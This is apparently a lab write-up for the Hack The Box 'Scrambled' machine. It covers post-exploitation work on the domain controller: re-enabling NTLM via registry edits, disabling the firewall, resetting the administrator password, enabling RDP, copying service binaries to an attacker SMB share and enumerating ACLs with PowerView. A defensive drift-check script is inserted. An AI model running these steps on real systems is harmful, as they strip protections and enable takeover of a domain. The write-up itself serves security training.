Beyond


While I had Scrambled ways to compromise the target system leading to complete domain compromise, I decided to investigate how the target system had the NTLM authentication disabled across the entire network and what specific configurations are responsible for that.

ps c:\temp> cmd /c gpresult /Scope Computer /h c:\temp\gpresult.html

The command above dumps the security configuration of both the system and the domain into a single HTML file. This command is almost always limited to high-privileged users, such as administrator or SYSTEM.

Opening up the HTML file through Firefox, and navigating to Policies > Windows Settings > Security Settings > Local Policies/Security Options > Other, I see those 3 attributes set to Deny All. Those 3 configurations are directly responsible for disabling NTLM authentication.

Those can also be checked manually through PowerShell

ps c:\temp> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"
 
 
auth132                      : IISSUBA
auth2                        : RASSFM
ntlmminclientsec             : 0
ntlmminserversec             : 536870912
restrictreceivingntlmtraffic : 2
restrictsendingntlmtraffic   : 2
auditntlmindomain            : 0
pspath                       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
                               Lsa\MSV1_0
psparentpath                 : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
                               Lsa
pschildname                  : MSV1_0
psdrive                      : HKLM
psprovider                   : Microsoft.PowerShell.Core\Registry

Checking the registry indeed reveals those 3 configurations. Now, I will turn that around.

ps c:\temp> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictSendingNTLMTraffic" -Value 0
ps c:\temp> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictReceivingNTLMTraffic" -Value 0
ps c:\temp> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictSendingNTLM2Traffic" -Value 0
ps c:\temp> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"
 
auth132                      : IISSUBA
auth2                        : RASSFM
ntlmminclientsec             : 0
ntlmminserversec             : 536870912
restrictreceivingntlmtraffic : 0
restrictsendingntlmtraffic   : 0
auditntlmindomain            : 0
restrictsendingntlm2traffic  : 0
pspath                       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
                               Lsa\MSV1_0
psparentpath                 : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
                               Lsa
pschildname                  : MSV1_0
psdrive                      : HKLM
psprovider                   : Microsoft.PowerShell.Core\Registry

It’s done. restrictreceivingntlmtraffic, restrictsendingntlmtraffic, and RestrictSendingNTLM2Traffic are all set to 0

Now I should be able to use the NTLM authentication across the entire domain/network
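A defender-side check for the change described above, as an added example that is not part of the original write-up: it compares the MSV1_0 values against the "Deny all" baseline (2) and flags value names that were not in the first listing. The function names and the two sample hashtables are assumptions, constructed from the listings on this page.

```powershell
# Added example: drift check for the NTLM restriction values under
# HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0.
# Function names are hypothetical; sample data is constructed from the page's listings.

# Baseline: 2 means "Deny all" for both values, as in the first listing.
$ExpectedValues = @{
    RestrictSendingNTLMTraffic   = 2
    RestrictReceivingNTLMTraffic = 2
}

# Value names seen in the untouched key; any other name was added afterwards.
$KnownNames = @(
    'auth132', 'auth2', 'ntlmminclientsec', 'ntlmminserversec',
    'restrictreceivingntlmtraffic', 'restrictsendingntlmtraffic', 'auditntlmindomain'
)

function Get-Msv10Values {
    # Read the live key into a hashtable (Windows only); skips the unnamed default value.
    $key = Get-Item -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
    $values = @{}
    foreach ($name in $key.GetValueNames()) {
        if ($name) { $values[$name] = $key.GetValue($name) }
    }
    return $values
}

function Compare-NtlmRestriction {
    # Emits one object per deviation from the baseline; emits nothing when the key matches.
    param(
        [Parameter(Mandatory)] [hashtable] $Current,
        [hashtable] $Expected = $ExpectedValues,
        [string[]]  $Known    = $KnownNames
    )
    foreach ($name in $Expected.Keys) {
        if (-not $Current.ContainsKey($name)) {
            [pscustomobject]@{ Name = $name; Issue = 'Missing'
                               Expected = $Expected[$name]; Actual = $null }
        }
        elseif ([int]$Current[$name] -ne [int]$Expected[$name]) {
            [pscustomobject]@{ Name = $name; Issue = 'Changed'
                               Expected = $Expected[$name]; Actual = $Current[$name] }
        }
    }
    foreach ($name in $Current.Keys) {
        # -notcontains is case-insensitive, matching how the registry treats value names.
        if ($Known -notcontains $name) {
            [pscustomobject]@{ Name = $name; Issue = 'UnexpectedValue'
                               Expected = $null; Actual = $Current[$name] }
        }
    }
}

# Constructed sample: the key as shown before the Set-ItemProperty calls.
$before = @{
    auth132 = 'IISSUBA'; auth2 = 'RASSFM'
    ntlmminclientsec = 0; ntlmminserversec = 536870912
    restrictreceivingntlmtraffic = 2; restrictsendingntlmtraffic = 2
    auditntlmindomain = 0
}

# Constructed sample: the key as shown after the Set-ItemProperty calls.
$after = @{
    auth132 = 'IISSUBA'; auth2 = 'RASSFM'
    ntlmminclientsec = 0; ntlmminserversec = 536870912
    restrictreceivingntlmtraffic = 0; restrictsendingntlmtraffic = 0
    auditntlmindomain = 0; restrictsendingntlm2traffic = 0
}

'--- before ---'
Compare-NtlmRestriction -Current $before | Format-Table -AutoSize
'--- after ---'
Compare-NtlmRestriction -Current $after | Format-Table -AutoSize

# On a live host, run elevated:
#   Compare-NtlmRestriction -Current (Get-Msv10Values)
```

Run on a schedule or from a configuration-management agent, a non-empty result on a host that is supposed to block NTLM is worth an alert, since Group Policy only rewrites these values at its next refresh.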

ps c:\temp> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False

I will first drop the firewall before testing the NTLM authentication

ps c:\temp> net user administrator Qwer1234
The command completed successfully.

I will then change the password of the administrator user

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ evil-winrm -i dc1.scrm.local -u administrator -p Qwer1234
 
Evil-WinRM shell v3.4
 
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
 
*evil-winrm* ps c:\Users\administrator\Documents> whoami
scrm\administrator
*evil-winrm* ps c:\Users\administrator\Documents> hostname
DC1
*evil-winrm* ps c:\Users\administrator\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::181
   ipv6 address. . . . . . . . . . . : dead:beef::8516:7ac6:78b:c7b
   link-local ipv6 address . . . . . : fe80::8516:7ac6:78b:c7b%14
   ipv4 address. . . . . . . . . . . : 10.10.11.168
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%14
                                       10.10.10.2

Like so, I am able to WinRM to the DC1 host with the NTLM authentication

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ smbclient -L //dc1.scrm.local/ -U "administrator%Qwer1234"
 
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HR              Disk      
	IPC$            IPC       Remote IPC
	IT              Disk      
	NETLOGON        Disk      Logon server share 
	Public          Disk      
	Sales           Disk      
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to dc1.scrm.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Same goes for the SMB server!

ps c:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
ps c:\temp> netsh firewall add portopening TCP 3389 "Remote Desktop"
 
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.

I also enabled RDP

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ xfreerdp /u:administrator /p:Qwer1234 /v:dc1.scrm.local /cert:ignore /dynamic-resolution 
[22:49:08:579] [237193:237194] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[22:49:08:579] [237193:237194] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[22:49:08:800] [237193:237194] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[22:49:08:800] [237193:237194] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[22:49:08:800] [237193:237194] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp
[22:49:09:748] [237193:237194] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]

Connecting to the RDP service running on the port 3389 using xfreerdp

Now I have an interactive RDP session

Objects


EU OU


Users


Groups


Service Accounts OU


DNS


WS01$


Services


ps c:\Temp> cmd /c sc qc ScrmOrders
[SC] QueryServiceConfig SUCCESS
 
service_name: ScrmOrders
        type               : 10  WIN32_OWN_PROCESS 
        start_type         : 2   AUTO_START
        error_control      : 1   NORMAL
        binary_path_name   : C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411
        load_order_group   : 
        tag                : 0
        display_name       : Scramble Sales Orders Server
        dependencies       : 
        service_start_name : LocalSystem
 
ps c:\Temp> ls "C:\Program Files\ScrambleCorp\SalesOrdersService"
 
 
    directory: C:\Program Files\ScrambleCorp\SalesOrdersService
 
 
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       03/11/2021     21:05          19456 ScrambleLib.dll                                                       
-a----       03/11/2021     21:05          11776 ScrambleServer.exe                                                    
-a----       03/11/2021     21:05          17408 ScrambleServerLib.dll          
 
ps c:\Temp> cmd /c copy "C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe" \\10.10.16.8\smb\smb\
        1 file(s) copied.
ps c:\Temp> cmd /c copy "C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServerLib.dll" \\10.10.16.8\smb\smb\
        1 file(s) copied.

ScrambleServer.exe ScrambleServerLib.dll

Web


PS C:\inetpub> ls
 
 
    Directory: C:\inetpub
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       04/02/2020     01:45                custerr
d-----       08/11/2021     00:24                history
d-----       08/02/2020     22:30                logs
d-----       04/02/2020     01:45                temp
d-----       04/11/2021     19:03                wwwroot
 
PS C:\inetpub> ls .\wwwroot\
 
 
    Directory: C:\inetpub\wwwroot
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       04/11/2021     00:01                assets
d-----       04/11/2021     18:56                images
-a----       04/11/2021     18:13           2313 index.html
-a----       04/11/2021     19:01           2888 newuser.html
-a----       04/11/2021     01:19           1668 passwords.html
-a----       04/11/2021     19:00           2340 salesorders.html
-a----       04/11/2021     18:55           2204 support.html
-a----       29/05/2022     17:50           2476 supportrequest.html

GP


rsop.msc


Default Domain Controllers Policy Default Domain Policy

Default Domain Policy


Default Domain Controllers Policy


Changed!


Changed! Domain-wide

Also enabled this at Computer Configuration\Policies\Administrative Templates\Network\Lanman Workstation, so that file transfer from the target system to Kali over SMB is possible

ps c:\Temp> cmd /c gpupdate /FORCE
Updating policy...
 
Computer Policy update has completed successfully.
User Policy update has completed successfully.

done

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ simplesmb . -smb2support 
[*] Incoming connection (10.10.11.168,63108)
[*] AUTHENTICATE_MESSAGE (SCRM\DC1$,DC1)
[*] User DC1\DC1$ authenticated successfully
[*] dc1$::SCRM:aaaaaaaaaaaaaaaa:6895cc3b4b98efe08ce34a2ebdc7a46b:01010000000000000007ffcc471dda016f832cc4f47ac645000000000100100071004800760048006400570063004d000300100071004800760048006400570063004d000200100050004100640045006b0064006b0048000400100050004100640045006b0064006b004800070008000007ffcc471dda010600040002000000080030003000000000000000000000000040000061ea1ce070279bddae8b0c6c1311484bf02dc1fee5bfe6dfd7f9ccf7c4e94b610a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0038000000000000000000
[*] connecting share(1:smb)
[*] disconnecting share(1:smb)
[*] Closing down connection (10.10.11.168,63108)
 
ps c:\Temp> cmd /c copy \\10.10.16.8\smb\PowerView.ps1 .
        1 file(s) copied.

EU Users


EU Computers


SMB


ADCS


Templates


MSSQL


ACL


PS C:\Temp> . .\PowerView.ps1
PS C:\Temp> Find-InterestingDomainAcl -Domain SCRM.LOCAL -ResolveGUIDs
Find-InterestingDomainAcl -Domain SCRM.LOCAL -ResolveGUIDs
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a 
distinguishedname with Convert-ADName
 
 
ObjectDN                : CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=@,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=m.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=a.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=b.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=c.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=d.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=e.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=f.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=g.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=h.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=i.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=j.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=k.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : DC=l.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete, 
                          GenericWrite, WriteDacl, WriteOwner
ObjectAceType           : None
AceFlags                : ContainerInherit, Inherited
AceType                 : AccessAllowed
InheritanceFlags        : ContainerInherit
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName   : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass  : group
 
ObjectDN                : CN=DFSR-LocalSettings,CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : All
AceFlags                : None
AceType                 : AccessAllowedObject
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1000
IdentityReferenceName   : DC1$
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
IdentityReferenceClass  : computer
 
ObjectDN                : CN=Domain System Volume,CN=DFSR-LocalSettings,CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : All
AceFlags                : Inherited
AceType                 : AccessAllowedObject
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1000
IdentityReferenceName   : DC1$
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
IdentityReferenceClass  : computer
 
ObjectDN                : CN=SYSVOL Subscription,CN=Domain System Volume,CN=DFSR-LocalSettings,CN=DC1,OU=Domain 
                          Controllers,DC=scrm,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : All
AceFlags                : Inherited
AceType                 : AccessAllowedObject
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-2743207045-1827831105-2542523200-1000
IdentityReferenceName   : DC1$
IdentityReferenceDomain : scrm.local
IdentityReferenceDN     : CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
IdentityReferenceClass  : computer

Not much

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ rpcclient $IP -N -U 'administrator%Qwer1234'
rpcclient $> lookupsids S-1-5-21-2743207045-1827831105-2542523200-1112
S-1-5-21-2743207045-1827831105-2542523200-1112 *unknown*\*unknown* (8)

Likely a deleted AD object